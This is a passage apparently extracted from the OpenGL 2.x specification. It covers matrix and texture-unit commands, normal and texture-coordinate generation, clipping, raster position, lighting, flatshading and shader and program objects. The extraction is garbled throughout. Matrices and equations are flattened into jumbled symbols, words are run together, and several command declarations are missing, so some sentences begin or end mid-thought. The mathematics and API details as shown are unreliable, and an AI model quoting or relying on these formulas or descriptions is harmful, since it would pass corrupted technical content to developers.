LoadTransposeMatrix[fd](m);is the same as the effect of LoadMatrix[fd](mT ); The effect of MultTransposeMatrix[fd](m);is the same as the effect of MultMatrix[fd](mT ); The command void LoadIdentity( void );effectively calls LoadMatrix with the identity matrix: 1 0 0 0 0 1 0 0 0 0 1 0. 0 0 0 1 There are a variety of other commands that manipulate matrices. Rotate,Translate, Scale, Frustum, and Ortho manipulate the current matrix. Each com-putes a matrix and then invokes MultMatrix with this matrix. In the case of void Rotate{fd}( T θ, T x, T y, T z ); 0 R 0. 0 0 0 0 1Let u = v/||v|| = ( x0 y0 z 0 )T . If 0 −z 0 y0 S = z0 0 −x0 −y 0 x0 0 then R = uuT + cos θ(I − uuT ) + sin θS. The arguments to void Translate{fd}( T x, T y, T z ); 1 0 0 x 0 1 0 y 0 0 1 z . 0 0 0 1 void Scale{fd}( T x, T y, T z ); produces a general scaling along the x-, y-, and z- axes. The corresponding matrixis x 0 0 0 0 y 0 0 0 0 z 0. 0 0 0 1 For the coordinates (l b − n)T and (r t − n)T specify the points on the near clippingplane that are mapped to the lower left and upper right corners of the window,respectively (assuming that the eye is located at (0 0 0)T ). f gives the distancefrom the eye to the far clipping plane. If either n or f is less than or equal to zero,l is equal to r, b is equal to t, or n is equal to f , the error INVALID VALUE results.The corresponding matrix is 2n r+l 0 0 r−l r−l 0 2n t+b t−b t−b 0 . − ff +n 2f n 0 0 −n − f −n 0 0 −1 0 void Ortho( double l, double r, double b, double t, double n, double f ); m1 m5 m9 m13 s m2 m6 m10 m14 t , m3 m7 m11 m15 r m4 m8 m12 m16 qwhere the left matrix is the current texture matrix. The matrix is applied to thecoordinates resulting from texture coordinate generation (which may simply be thecurrent texture coordinates), and the resulting transformed coordinates become thetexture coordinates associated with a vertex. Setting the matrix mode to TEXTUREcauses the already described matrix operations to apply to the texture matrix. The command specifies the active texture unit selector, ACTIVE TEXTURE. Each texture unit con-tains up to two distinct sub-units: a texture coordinate processing unit (consistingof a texture matrix stack and texture coordinate generation state) and a textureimage unit (consisting of all the texture state defined in section 3.8). In implemen-tations with a different number of supported texture coordinate sets and textureimage units, some texture units may consist of only one of the two sub-units. The active texture unit selector specifies the texture coordinate set accessedby commands involving texture coordinate processing. Such commands includethose accessing the current matrix stack (if MATRIX MODE is TEXTURE), TexEnvcommands controlling point sprite coordinate replacement (see section 3.3), Tex-Gen (section 2.11.4), Enable/Disable (if any texture coordinate generation enumis selected), as well as queries of the current texture coordinates and current rastertexture coordinates. If the texture coordinate set number corresponding to the cur-rent value of ACTIVE TEXTURE is greater than or equal to the implementation-dependent constant MAX TEXTURE COORDS, the error INVALID OPERATION isgenerated by any such command. The active texture unit selector also selects the texture image unit accessedby commands involving texture image processing (section 3.8). Such commandsinclude all variants of TexEnv (except for those controlling point sprite coordi-nate replacement), TexParameter, and TexImage commands, BindTexture, En-able/Disable for any texture target (e.g., TEXTURE 2D), and queries of all suchstate. If the texture image unit number corresponding to the current value ofACTIVE TEXTURE is greater than or equal to the implementation-dependent con-stant MAX COMBINED TEXTURE IMAGE UNITS, the error INVALID OPERATION isgenerated by any such command. ActiveTexture generates the error INVALID ENUM if an invalid texture is spec-ified. texture is a symbolic constant of the form TEXTUREi, indicating that tex-ture unit i is to be modified. The constants obey TEXTUREi = TEXTURE0 + i (iis in the range 0 to k − 1, where k is the larger of MAX TEXTURE COORDS andMAX COMBINED TEXTURE IMAGE UNITS). For backwards compatibility, the implementation-dependentconstant MAX TEXTURE UNITS specifies the number of conventional texture unitssupported by the implementation. Its value must be no larger than the minimum ofMAX TEXTURE COORDS and MAX COMBINED TEXTURE IMAGE UNITS. There is a stack of matrices for each of matrix modes MODELVIEW,PROJECTION, and COLOR, and for each texture unit. For MODELVIEW mode, thestack depth is at least 32 (that is, there is a stack of at least 32 model-view ma-trices). For the other modes, the depth is at least 2. Texture matrix stacks for all texture units have the same depth. The current matrix in any mode is the matrix onthe top of the stack for that mode. pushes the stack down by one, duplicating the current matrix in both the top of thestack and the entry below it. pops the top entry off of the stack, replacing the current matrix with the matrixthat was the second entry in the stack. The pushing or popping takes place on thestack corresponding to the current matrix mode. Popping a matrix off a stack withonly one entry generates the error STACK UNDERFLOW; pushing a matrix onto a fullstack generates STACK OVERFLOW. When the current matrix mode is TEXTURE, the texture matrix stack of theactive texture unit is pushed or popped. The state required to implement transformations consists of an integer for theactive texture unit selector, a four-valued integer indicating the current matrixmode, one stack of at least two 4 × 4 matrices for each of COLOR, PROJECTION,and each texture coordinate set, TEXTURE; and a stack of at least 32 4 × 4 matri-ces for MODELVIEW. Each matrix stack has an associated stack pointer. Initially,there is only one matrix on each stack, and all matrices are set to the identity.The initial active texture unit selector is TEXTURE0, and the initial matrix mode isMODELVIEW. with target equal to RESCALE NORMAL or NORMALIZE. This requires two bits ofstate. The initial state is for normals not to be rescaled or normalized. If the model-view matrix is M , then the normal is transformed to eye coordi-nates by: ( nx 0 ny 0 nz 0 q 0 ) = ( nx ny nz q ) · M −1 x y z are the associated vertex coordinates, thenwhere, if w 0, w = 0, x q= −( nx ny nz ) y (2.1) z , w 6= 0 w ( nx 0 ny 0 nz 0 ) = ( nx ny nz ) · Mu −1where Mu is the upper leftmost 3x3 matrix taken from M . Rescale multiplies the transformed normals by a scale factor ( nx 00 ny 00 nz 00 ) = f ( nx 0 ny 0 nz 0 )If rescaling is disabled, then f = 1. If rescaling is enabled, then f is computedas (mij denotes the matrix element in row i and column j of M −1 , numbering thetopmost row of the matrix as row 1 and the leftmost column as column 1) 1 f=√ 2 m31 + m32 2 + m33 2 Note that if the normals sent to GL were unit length and the model-view matrixuniformly scales space, then rescale makes the transformed normals unit length. Alternatively, an implementation may choose f as 1 f=q nx 0 2 + ny 0 2 + nz 0 2 recomputing f for each normal. This makes all non-zero length normals unit lengthregardless of their input length and the nature of the model-view matrix. nf = m ( nx 00 ny 00 nz 00 )If normalization is disabled, then m = 1. Otherwise 1 m= q nx 00 2 + ny 00 2 + nz 00 2 Because we specify neither the floating-point format nor the means for matrixinversion, we cannot specify behavior in the case of a poorly-conditioned (nearlysingular) model-view matrix M . In case of an exactly singular matrix, the trans-formed normal is undefined. If the GL implementation determines that the model-view matrix is uninvertible, then the entries in the inverted matrix are arbitrary. Inany case, neither normal transformation nor use of the transformed normal maylead to GL interruption or termination. where ( p01 p02 p03 p04 ) = ( p1 p2 p3 p4 ) M −1xe , ye , ze , and we are the eye coordinates of the vertex. p1 , . . . , p4 are set bycalling TexGen with pname set to EYE PLANE in correspondence with setting thecoefficients in the OBJECT PLANE case. M is the model-view matrix in effectwhen p1 , . . . , p4 are specified. Computed texture coordinates may be inaccurate orundefined if M is poorly conditioned or singular. When used with a suitably constructed texture image, calling TexGen withTEXTURE GEN MODE indicating SPHERE MAP can simulate the reflected image ofa spherical environment on a polygon. SPHERE MAP texture coordinates are gen-erated as follows. Denote the unit vector pointing from the origin to the vertex(in eye coordinates) by u. Denote the current normal, after transformation to eyecoordinates, by nf . Let r = ( rx ry rz )T , the reflection vector, be given by r = u − 2nf T (nf u) , qand let m = 2 rx2 + ry2 + (rz + 1)2 . Then the value assigned to an s coordinate(the first TexGen argument value is S) is s = rx /m + 21 ; the value assigned to a tcoordinate is t = ry /m + 21 . Calling TexGen with a coord of either R or Q whenpname indicates SPHERE MAP generates the error INVALID ENUM. If TEXTURE GEN MODE indicates REFLECTION MAP, compute the reflectionvector r as described for the SPHERE MAP mode. Then the value assigned to ans coordinate is s = rx ; the value assigned to a t coordinate is t = ry ; and the valueassigned to an r coordinate is r = rz . Calling TexGen with a coord of Q whenpname indicates REFLECTION MAP generates the error INVALID ENUM. If TEXTURE GEN MODE indicates NORMAL MAP, compute the normal vector nfas described in section 2.11.3. Then the value assigned to an s coordinate is s =nf x ; the value assigned to a t coordinate is t = nf y ; and the value assigned to anr coordinate is r = nf z (the values nf x , nf y , and nf z are the components of nf .)Calling TexGen with a coord of Q when pname indicates NORMAL MAP generatesthe error INVALID ENUM. A texture coordinate generation function is enabled or disabled using En-able and Disable with an argument of TEXTURE GEN S, TEXTURE GEN T, TEXTURE GEN R, or TEXTURE GEN Q (each indicates the corresponding texture co-ordinate). When enabled, the specified texture coordinate is computed accordingto the current EYE LINEAR, OBJECT LINEAR or SPHERE MAP specification, de-pending on the current setting of TEXTURE GEN MODE for that coordinate. Whendisabled, subsequent vertices will take the indicated texture coordinate from thecurrent texture coordinates. The state required for texture coordinate generation for each texture unit com-prises a five-valued integer for each coordinate indicating coordinate generationmode, and a bit for each coordinate to indicate whether texture coordinate genera-tion is enabled or disabled. In addition, four coefficients are required for the fourcoordinates for each of EYE LINEAR and OBJECT LINEAR. The initial state has thetexture generation function disabled for all texture coordinates. The initial valuesof pi for s are all 0 except p1 which is one; for t all the pi are zero except p2 , whichis 1. The values of pi for r and q are all 0. These values of pi apply for both theEYE LINEAR and OBJECT LINEAR versions. Initially all texture generation modesare EYE LINEAR. 2.12 ClippingPrimitives are clipped to the clip volume. In clip coordinates, the view volume isdefined by −wc ≤ xc ≤ wc −wc ≤ yc ≤ wc −wc ≤ zc ≤ wc .This view volume may be further restricted by as many as n client-defined clipplanes to generate the clip volume. (n is an implementation dependent maximumthat must be at least 6.) Each client-defined plane specifies a half-space. The clipvolume is the intersection of all such half-spaces with the view volume (if there noclient-defined clip planes are enabled, the clip volume is the view volume). A client-defined clip plane is specified with void ClipPlane( enum p, double eqn[4] );The value of the first argument, p, is a symbolic constant, CLIP PLANEi, where i isan integer between 0 and n − 1, indicating one of n client-defined clip planes. eqnis an array of four double-precision floating-point values. These are the coefficientsof a plane equation in object coordinates: p1 , p2 , p3 , and p4 (in that order). Theinverse of the current model-view matrix is applied to these coefficients, at the timethey are specified, yielding ( p01 p02 p03 p04 ) = ( p1 p2 p3 p4 ) M −1 (where M is the current model-view matrix; the resulting plane equation is unde-fined if M is singular and may be inaccurate if M is poorly-conditioned) to obtainthe plane equation coefficients in eye coordinates. All points with eye coordinates( xe ye ze we )T that satisfy xe ye ( p01 p02 p03 p04 ) ze ≥ 0 we lie in the half-space defined by the plane; points that do not satisfy this conditiondo not lie in the half-space. When a vertex shader is active, the vector ( xe ye ze we )T is no longercomputed. Instead, the value of the gl ClipVertex built-in variable is used in itsplace. If gl ClipVertex is not written by the vertex shader, its value is undefined,which implies that the results of clipping to any client-defined clip planes are alsoundefined. The user must ensure that the clip vertex and client-defined clip planesare defined in the same coordinate space. Client-defined clip planes are enabled with the generic Enable command anddisabled with the Disable command. The value of the argument to either com-mand is CLIP PLANEi where i is an integer between 0 and n; specifying a valueof i enables or disables the plane equation with index i. The constants obeyCLIP PLANEi = CLIP PLANE0 + i. If the primitive under consideration is a point, then clipping passes it un-changed if it lies within the clip volume; otherwise, it is discarded. If the prim-itive is a line segment, then clipping does nothing to it if it lies entirely within theclip volume and discards it if it lies entirely outside the volume. If part of the linesegment lies in the volume and part lies outside, then the line segment is clippedand new vertex coordinates are computed for one or both vertices. A clipped linesegment endpoint lies on both the original line segment and the boundary of theclip volume. This clipping produces a value, 0 ≤ t ≤ 1, for each clipped vertex. If thecoordinates of a clipped vertex are P and the original vertices’ coordinates are P1and P2 , then t is given by P = tP1 + (1 − t)P2 . The value of t is used in color, secondary color, texture coordinate, and fog coor-dinate clipping (section 2.14.8). If the primitive is a polygon, then it is passed if every one of its edges liesentirely inside the clip volume and either clipped or discarded otherwise. Polygon clipping may cause polygon edges to be clipped, but because polygon connectivitymust be maintained, these clipped edges are connected by new edges that lie alongthe clip volume’s boundary. Thus, clipping may require the introduction of newvertices into a polygon. Edge flags are associated with these vertices so that edgesintroduced by clipping are flagged as boundary (edge flag TRUE), and so that orig-inal edges of the polygon that become cut off at these vertices retain their originalflags. If it happens that a polygon intersects an edge of the clip volume’s boundary,then the clipped polygon must include a point on this boundary edge. This pointmust lie in the intersection of the boundary edge and the convex hull of the verticesof the original polygon. We impose this requirement because the polygon may notbe exactly planar. Primitives rendered with clip planes must satisfy a complementarity crite-rion. Suppose a single clip plane with coefficients ( p01 p02 p03 p04 ) (or a num-ber of similarly specified clip planes) is enabled and a series of primitives aredrawn. Next, suppose that the original clip plane is respecified with coefficients( −p01 −p02 −p03 −p04 ) (and correspondingly for any other clip planes) andthe primitives are drawn again (and the GL is otherwise in the same state). In thiscase, primitives must not be missing any pixels, nor may any pixels be drawn twicein regions where those primitives are cut by the clip planes. The state required for clipping is at least 6 sets of plane equations (each consist-ing of four double-precision floating-point coefficients) and at least 6 correspond-ing bits indicating which of these client-defined plane equations are enabled. In theinitial state, all client-defined plane equation coefficients are zero and all planes aredisabled. Gets of CURRENT RASTER TEXTURE COORDS are affected by the setting of thestate ACTIVE TEXTURE. The coordinates are treated as if they were specified in a Vertex command. Ifa vertex shader is active, this vertex shader is executed using the x, y, z, and wcoordinates as the object coordinates of the vertex. Otherwise, the x, y, z, andw coordinates are transformed by the current model-view and projection matri-ces. These coordinates, along with current values, are used to generate primaryand secondary colors and texture coordinates just as is done for a vertex. The col-ors and texture coordinates so produced replace the colors and texture coordinatesstored in the current raster position’s associated data. If a vertex shader is activethen the current raster distance is set to the value of the shader built in varyinggl FogFragCoord. Otherwise, if the value of the fog source (see section 3.10)is FOG COORD, then the current raster distance is set to the value of the currentfog coordinate. Otherwise, the current raster distance is set to the distance fromthe origin of the eye coordinate system to the vertex as transformed by only thecurrent model-view matrix. This distance may be approximated as discussed insection 3.10. Since vertex shaders may be executed when the raster position is set, any at-tributes not written by the shader will result in undefined state in the current rasterposition. Vertex shaders should output all varying variables that would be usedwhen rasterizing pixel primitives using the current raster position. The transformed coordinates are passed to clipping as if they represented apoint. If the “point” is not culled, then the projection to window coordinates iscomputed (section 2.11) and saved as the current raster position, and the validbit is set. If the “point” is culled, the current raster position and its associateddata become indeterminate and the valid bit is cleared. Figure 2.7 summarizes thebehavior of the current raster position. Alternately, the current raster position may be set by one of the WindowPoscommands: xw = x yw = y Valid Rasterpos In Clip Project Raster Vertex/Normal Position Current Transformation Normal Raster Current Lighting Distance Color & Materials Associated Texture Data Current Texgen Matrix 0 Texture Current Coord Set 0 Raster Position Texture Current Texgen Matrix 1 Texture Coord Set 1 Texture Current Texgen Matrix 2 Texture Coord Set 2 Texture Current Texgen Matrix 3 Texture Coord Set 3 Figure 2.7. The current raster position and how it is set. Four texture units are shown; however, multitexturing may support a different number of units depending on the implementation. n, z≤0 zw = f, z≥1 n + z(f − n), otherwise wc = 1 where n and f are the values passed to DepthRange (see section 2.11.1). Lighting, texture coordinate generation and transformation, and clipping arenot performed by the WindowPos functions. Instead, in RGBA mode, the currentraster color and secondary color are obtained by clamping each component of thecurrent color and secondary color, respectively, to [0, 1]. In color index mode, thecurrent raster color index is set to the current color index. The current raster texturecoordinates are set to the current texture coordinates, and the valid bit is set. If the value of the fog source is FOG COORD SRC, then the current raster dis-tance is set to the value of the current fog coordinate. Otherwise, the raster distanceis set to 0. The current raster position requires six single-precision floating-point valuesfor its xw , yw , and zw window coordinates, its wc clip coordinate, its raster distance(used as the fog coordinate in raster processing), a single valid bit, four floating-point values to store the current RGBA color, four floating-point values to store thecurrent RGBA secondary color, one floating-point value to store the current colorindex, and 4 floating-point values for texture coordinates for each texture unit. Inthe initial state, the coordinates and texture coordinates are all (0, 0, 0, 1), the eyecoordinate distance is 0, the fog coordinate is 0, the valid bit is set, the associatedRGBA color is (1, 1, 1, 1), the associated RGBA secondary color is (0, 0, 0, 1), andthe associated color index color is 1. In RGBA mode, the associated color indexalways has its initial value; in color index mode, the RGBA color and secondarycolor always maintain their initial values. [0,2k−1] Convert to [0.0,1.0] Current RGBA Clamp to Color Lighting [0.0, 1.0] Convert to [−2k,2k−1] [−1.0,1.0] float Color Clipping Convert to Flatshade? fixed−point Primitive Clipping Figure 2.8. Processing of RGBA colors. The heavy dotted lines indicate both pri- mary and secondary vertex colors, which are processed in the same fashion. See table 2.9 for the interpretation of k. [0,2n−1] Convert to Current float Color Mask to float Index Lighting [0.0, 2n−1] Color Clipping Convert to Flatshade? fixed−point Primitive Clipping Figure 2.9. Processing of color indices. n is the number of bits in a color index. GL Type Conversion ubyte c/(28 − 1) byte (2c + 1)/(28 − 1) ushort c/(216 − 1) short (2c + 1)/(216 − 1) uint c/(232 − 1) int (2c + 1)/(232 − 1) float c double c Table 2.9: Component conversions. Color, normal, and depth components, (c),are converted to an internal floating-point representation, (f ), using the equationsin this table. All arithmetic is done in the internal floating point format. Theseconversions apply to components specified as parameters to GL commands and tocomponents in pixel data. The equations remain the same even if the implementedranges of the GL data types are greater than the minimum required ranges. (Referto table 2.2) Next, lighting, if enabled, produces either a color index or primary and sec-ondary colors. If lighting is disabled, the current color index or current color(primary color) and current secondary color are used in further processing. Afterlighting, RGBA colors are clamped to the range [0, 1]. A color index is convertedto fixed-point and then its integer portion is masked (see section 2.14.6). Afterclamping or masking, a primitive may be flatshaded, indicating that all vertices ofthe primitive are to have the same colors. Finally, if a primitive is clipped, thencolors (and texture coordinates) must be computed at the vertices introduced ormodified by clipping. 2.14.1 LightingGL lighting computes colors for each vertex sent to the GL. This is accomplishedby applying an equation defined by a client-specified lighting model to a collectionof parameters that can include the vertex coordinates, the coordinates of one ormore light sources, the current normal, and parameters defining the characteristicsof the light sources and a current material. The following discussion assumes thatthe GL is in RGBA mode. (Color index lighting is described in section 2.14.5.) Lighting is turned on or off using the generic Enable or Disable commandswith the symbolic value LIGHTING. If lighting is off, the current color and current secondary color are assigned to the vertex primary and secondary color, respec-tively. If lighting is on, colors computed from the current lighting parameters areassigned to the vertex primary and secondary colors. Lighting Operation d1 d2 = max{d1 · d2 , 0}. Table 2.10: Summary of lighting parameters. The range of individual color com-ponents is (−∞, +∞). sponding to the vertex being lit, and n be the corresponding normal. Let Pe be theeyepoint ((0, 0, 0, 1) in eye coordinates). Lighting produces two colors at a vertex: a primary color cpri and a secondarycolor csec . The values of cpri and csec depend on the light model color control, ces .If ces = SINGLE COLOR, then the equations to compute cpri and csec are cpri = ecm + acm ∗ acs n−1 X + (atti )(spoti ) [acm ∗ acli −−→ i=0 + (n VPpli )dcm ∗ dcli + (fi )(n ĥi )srm scm ∗ scli ] csec = (0, 0, 0, 1) cpri = ecm + acm ∗ acs n−1 X + (atti )(spoti ) [acm ∗ acli −−→ i=0 + (n VPpli )dcm ∗ dcli ] n−1 X csec = (atti )(spoti )(fi )(n ĥi )srm scm ∗ scli i=0 where ( −−→ 1, n VPpli 6= 0, fi = (2.2) 0, otherwise, ( −−→ −−→ VPpli + VPe , vbs = TRUE, hi = −−→ (2.3) VPpli + ( 0 0 1 )T , vbs = FALSE, 1 , if Ppli ’s w 6= 0, k0i + k1i kVPpli k + k2i kVPpli k2 atti = (2.4) 1.0, otherwise. −−−→ −−−→ s (Ppli V ŝdli ) rli , crli 6= 180.0, Ppli V ŝdli ≥ cos(crli ), −−−→ spoti = 0.0, 6 180.0, Ppli V ŝdli < cos(crli ),(2.5) crli = 1.0, crli = 180.0.All computations are carried out in eye coordinates. The value of A produced by lighting is the alpha value associated with dcm .A is always associated with the primary color cpri ; the alpha component of csec isalways 1. Results of lighting are undefined if the we coordinate (w in eye coordinates) ofV is zero. Lighting may operate in two-sided mode (tbs = TRUE), in which a front coloris computed with one set of material parameters (the front material) and a backcolor is computed with a second set of material parameters (the back material).This second computation replaces n with −n. If tbs = FALSE, then the back colorand front color are both assigned the color computed using the front material withn. Additionally, vertex shaders can operate in two-sided color mode. When a ver-tex shader is active, front and back colors can be computed by the vertex shader andwritten to the gl FrontColor, gl BackColor, gl FrontSecondaryColorand gl BackSecondaryColor outputs. If VERTEX PROGRAM TWO SIDE is en-abled, the GL chooses between front and back colors, as described below. Oth-erwise, the front color output is always selected. Two-sided color mode isenabled and disabled by calling Enable or Disable with the symbolic valueVERTEX PROGRAM TWO SIDE. The selection between back and front colors depends on the primitive of whichthe vertex being lit is a part. If the primitive is a point or a line segment, the frontcolor is always selected. If it is a polygon, then the selection is based on the sign ofthe (clipped or unclipped) polygon’s signed area computed in window coordinates.One way to compute this area is 1 n−1 X a= xi y i⊕1 − xi⊕1 w yw i (2.6) 2 i=0 w w where xiw and yw i are the x and y window coordinates of the ith vertex of the n-vertex polygon (vertices are numbered starting at zero for purposes of this com-putation) and i ⊕ 1 is (i + 1) mod n. The interpretation of the sign of this value iscontrolled with void FrontFace( enum dir );Setting dir to CCW (corresponding to counter-clockwise orientation of the projectedpolygon in window coordinates) indicates that if a ≤ 0, then the color of each vertex of the polygon becomes the back color computed for that vertex while ifa > 0, then the front color is selected. If dir is CW, then a is replaced by −a in theabove inequalities. This requires one bit of state; initially, it indicates CCW. dx dy dz is transformed to 0 d dx x d0 = Mu d y . y d0z dz An individual light is enabled or disabled by calling Enable or Disable with thesymbolic value LIGHTi (i is in the range 0 to n − 1, where n is the implementation-dependent number of lights). If light i is disabled, the ith term in the lightingequation is effectively removed from the summation. 2.14.3 ColorMaterialIt is possible to attach one or more material properties to the current color, sothat they continuously track its component values. This behavior is enabled anddisabled by calling Enable or Disable with the symbolic value COLOR MATERIAL. The command that controls which of these modes is selected is face is one of FRONT, BACK, or FRONT AND BACK, indicating whether the frontmaterial, back material, or both are affected by the current color. mode is oneof EMISSION, AMBIENT, DIFFUSE, SPECULAR, or AMBIENT AND DIFFUSE andspecifies which material property or properties track the current color. If mode isEMISSION, AMBIENT, DIFFUSE, or SPECULAR, then the value of ecm , acm , dcm orscm , respectively, will track the current color. If mode is AMBIENT AND DIFFUSE,both acm and dcm track the current color. The replacements made to material prop-erties are permanent; the replaced values remain until changed by either sending anew color or by setting a new material value when ColorMaterial is not currentlyenabled to override that particular value. When COLOR MATERIAL is enabled, theindicated parameter or parameters always track the current color. For instance,calling Current Color*() To subsequent vertex operations Color Front Ambient To lighting equations Material*(FRONT,AMBIENT) Color Front Diffuse To lighting equations Material*(FRONT,DIFFUSE) Color Front Specular To lighting equations Material*(FRONT,SPECULAR) Color Front Emission To lighting equations Material*(FRONT,EMISSION) Color State values flow along this path only when a command is issued ColorMaterial(FRONT, AMBIENT) while COLOR MATERIAL is enabled sets the front material acm to the value of thecurrent color. Material properties can be changed inside a Begin/End pair indirectly by en-abling ColorMaterial mode and making Color calls. However, when a vertexshader is active such property changes are not guaranteed to update material pa-rameters, defined in table 2.11, until the following End command. where atti and spoti are given by equations 2.4 and 2.5, respectively, and fi andĥi are given by equations 2.2 and 2.3, respectively. Let s0 = min{s, 1}. Finally, let n X −−→ d= (atti )(spoti )(dli )(n VPpli ). i=0 2.14.7 FlatshadingA primitive may be flatshaded, meaning that all vertices of the primitive are as-signed the same color index or the same primary and secondary colors. Thesecolors are the colors of the vertex that spawned the primitive. For a point, theseare the colors associated with the point. For a line segment, they are the colors ofthe second (final) vertex of the segment. For a polygon, they come from a selectedvertex depending on how the polygon was generated. Table 2.12 summarizes thepossibilities. Flatshading is controlled by Table 2.12: Polygon flatshading color selection. The colors used for flatshadingthe ith polygon generated by the indicated Begin/End type are derived from thecurrent color (if lighting is disabled) in effect when the indicated vertex is specified.If lighting is enabled, the colors are produced by lighting the indicated vertex.Vertices are numbered 1 through n, where n is the number of vertices between theBegin/End pair. mode value must be either of the symbolic constants SMOOTH or FLAT. If mode isSMOOTH (the initial state), vertex colors are treated individually. If mode is FLAT,flatshading is turned on. ShadeModel thus requires one bit of state. c = tc1 + (1 − t)c2 .(For a color index color, multiplying a color by a scalar means multiplying theindex by the scalar. For an RGBA color, it means multiplying each of R, G, B, andA by the scalar. Both primary and secondary colors are treated in the same fashion.)Polygon clipping may create a clipped vertex along an edge of the clip volume’sboundary. This situation is handled by noting that polygon clipping proceeds byclipping against one plane of the clip volume’s boundary at a time. Color clipping is done in the same way, so that clipped points always occur at the intersection ofpolygon edges (possibly already clipped) with the clip volume’s boundary. Texture and fog coordinates, vertex shader varying variables (section 2.15.3),and point sizes computed on a per vertex basis must also be clipped when a primi-tive is clipped. The method is exactly analogous to that used for color clipping. gram object. A program object is then linked, which generates executable codefrom all the compiled shader objects attached to the program. When a linkedprogram object is used as the current program object, the executable code for thevertex shaders it contains is used to process vertices. In addition to vertex shaders, fragment shaders can be created, compiled, andlinked into program objects. Fragment shaders affect the processing of fragmentsduring rasterization, and are described in section 3.11. A single program objectcan contain both vertex and fragment shaders. When the program object currently in use includes a vertex shader, its vertexshader is considered active and is used to process vertices. If the program objecthas no vertex shader, or no program object is currently in use, the fixed-functionmethod for processing vertices is used instead. The shader object is empty when it is created. The type argument specifies the typeof shader object to be created. For vertex shaders, type must be VERTEX SHADER.A non-zero name that can be used to reference the shader object is returned. If anerror occurs, zero will be returned. The command loads source code into the shader object named shader. string is an array of countpointers to optionally null-terminated character strings that make up the sourcecode. The length argument is an array with the number of chars in each string (the Each shader object has a boolean status, COMPILE STATUS, that is modified asa result of compilation. This status can be queried with GetShaderiv (see sec-tion 6.1.14). This status will be set to TRUE if shader was compiled without errorsand is ready for use, and FALSE otherwise. Compilation can fail for a variety ofreasons as listed in the OpenGL Shading Language Specification. If Compile-Shader failed, any information about a previous compile is lost. Thus a failedcompile does not restore the old state of shader. Changing the source code of a shader object with ShaderSource does notchange its compile status or the compiled shader code. Each shader object has an information log, which is a text string that is over-written as a result of compilation. This information log can be queried with Get-ShaderInfoLog to obtain more information about the compilation attempt (seesection 6.1.14). Shader objects can be deleted with the command these programmable stages are called executables. All information necessary fordefining an executable is encapsulated in a program object. A program object iscreated with the command Program objects are empty when they are created. A non-zero name that can beused to reference the program object is returned. If an error occurs, 0 will bereturned. To attach a shader object to a program object, use the command will link the program object named program. Each program object has a booleanstatus, LINK STATUS, that is modified as a result of linking. This status can bequeried with GetProgramiv (see section 6.1.14). This status will be set to TRUE ifa valid executable is created, and FALSE otherwise. Linking can fail for a varietyof reasons as specified in the OpenGL Shading Language Specification. Linkingwill also fail if one or more of the shader objects, attached to program are notcompiled successfully, or if more active uniform or active sampler variables areused in program than allowed (see section 2.15.3). If LinkProgram failed, anyinformation about a previous link of that program object is lost. Thus, a failed linkdoes not restore the old state of program. ables that are constant during program execution. Samplers are a special form ofuniform used for texturing (section 3.8). Varying variables hold the results of ver-tex shader execution that are used later in the pipeline. The following sectionsdescribe each of these variable types. Vertex Attributes Vertex shaders can access built-in vertex attribute variables corresponding to theper-vertex state set by commands such as Vertex, Normal, Color. Vertex shaderscan also define named attribute variables, which are bound to the generic vertexattributes that are set by VertexAttrib*. This binding can be specified by the ap-plication before the program is linked, or automatically assigned by the GL whenthe program is linked. When an attribute variable declared as a float, vec2, vec3 or vec4 is boundto a generic attribute index i, its value(s) are taken from the x, (x, y), (x, y, z), or(x, y, z, w) components, respectively, of the generic attribute i. When an attributevariable is declared as a mat2, mat3x2 or mat4x2, its matrix columns are takenfrom the (x, y) components of generic attributes i and i + 1 (mat2), from attributesi through i + 2 (mat3x2), or from attributes i through i + 3 (mat4x2). When anattribute variable is declared as a mat2x3, mat3 or mat4x3, its matrix columnsare taken from the (x, y, z) components of generic attributes i and i + 1 (mat2x3),from attributes i through i + 2 (mat3), or from attributes i through i + 3 (mat4x3).When an attribute variable is declared as a mat2x4, mat3x4 or mat4, its matrixcolumns are taken from the (x, y, z, w) components of generic attributes i and i+1(mat2x4), from attributes i through i + 2 (mat3x4), or from attributes i throughi + 3 (mat4). An attribute variable (either conventional or generic) is considered active if it isdetermined by the compiler and linker that the attribute may be accessed when theshader is executed. Attribute variables that are declared in a vertex shader but neverused will not count against the limit. In cases where the compiler and linker cannotmake a conclusive determination, an attribute will be considered active. A programobject will fail to link if the sum of the active generic and active conventionalattributes exceeds MAX VERTEX ATTRIBS. To determine the set of active vertex attributes used by a program, and to de-termine their types, use the command: This command provides information about the attribute selected by index. An in-dex of 0 selects the first active attribute, and an index of ACTIVE ATTRIBUTES − 1selects the last active attribute. The value of ACTIVE ATTRIBUTES can be queriedwith GetProgramiv (see section 6.1.14). If index is greater than or equal toACTIVE ATTRIBUTES, the error INVALID VALUE is generated. Note that indexsimply identifies a member in a list of active attributes, and has no relation to thegeneric attribute that the corresponding variable is bound to. The parameter program is the name of a program object for which the com-mand LinkProgram has been issued in the past. It is not necessary for program tohave been linked successfully. The link could have failed because the number ofactive attributes exceeded the limit. The name of the selected attribute is returned as a null-terminated string inname. The actual number of characters written into name, excluding the null termi-nator, is returned in length. If length is NULL, no length is returned. The maximumnumber of characters that may be written into name, including the null terminator,is specified by bufSize. The returned attribute name can be the name of a genericattribute or a conventional attribute (which begin with the prefix "gl ", see theOpenGL Shading Language specification for a complete list). The length of thelongest attribute name in program is given by ACTIVE ATTRIBUTE MAX LENGTH,which can be queried with GetProgramiv (see section 6.1.14). For the selected attribute, the type of the attribute is returned into type.The size of the attribute is returned into size. The value in size is inunits of the type returned in type. The type returned can be any ofFLOAT, FLOAT VEC2, FLOAT VEC3, FLOAT VEC4, FLOAT MAT2, FLOAT MAT3,FLOAT MAT4, FLOAT MAT2x3, FLOAT MAT2x4, FLOAT MAT3x2, FLOAT MAT3x4,FLOAT MAT4x2, or FLOAT MAT4x3. If an error occurred, the return parameters length, size, type and name will beunmodified. This command will return as much information about active attributes as pos-sible. If no information is available, length will be set to zero and name will be anempty string. This situation could arise if GetActiveAttrib is issued after a failedlink. After a program object has been linked successfully, the bindings of attributevariable names to indices can be queried. The command returns the generic attribute index that the attribute variable named name was boundto when the program object named program was last linked. name must be a null-terminated string. If name is active and is an attribute matrix, GetAttribLocation returns the index of the first column of that matrix. If program has not been suc-cessfully linked, the error INVALID OPERATION is generated. If name is not anactive attribute, if name is a conventional attribute, or if an error occurs, -1 will bereturned. The binding of an attribute variable to a generic attribute index can also bespecified explicitly. The command void BindAttribLocation( uint program, uint index, const char *name );specifies that the attribute variable named name in program program should bebound to generic vertex attribute index when the program is next linked. If namewas bound previously, its assigned binding is replaced with index. name must be anull terminated string. The 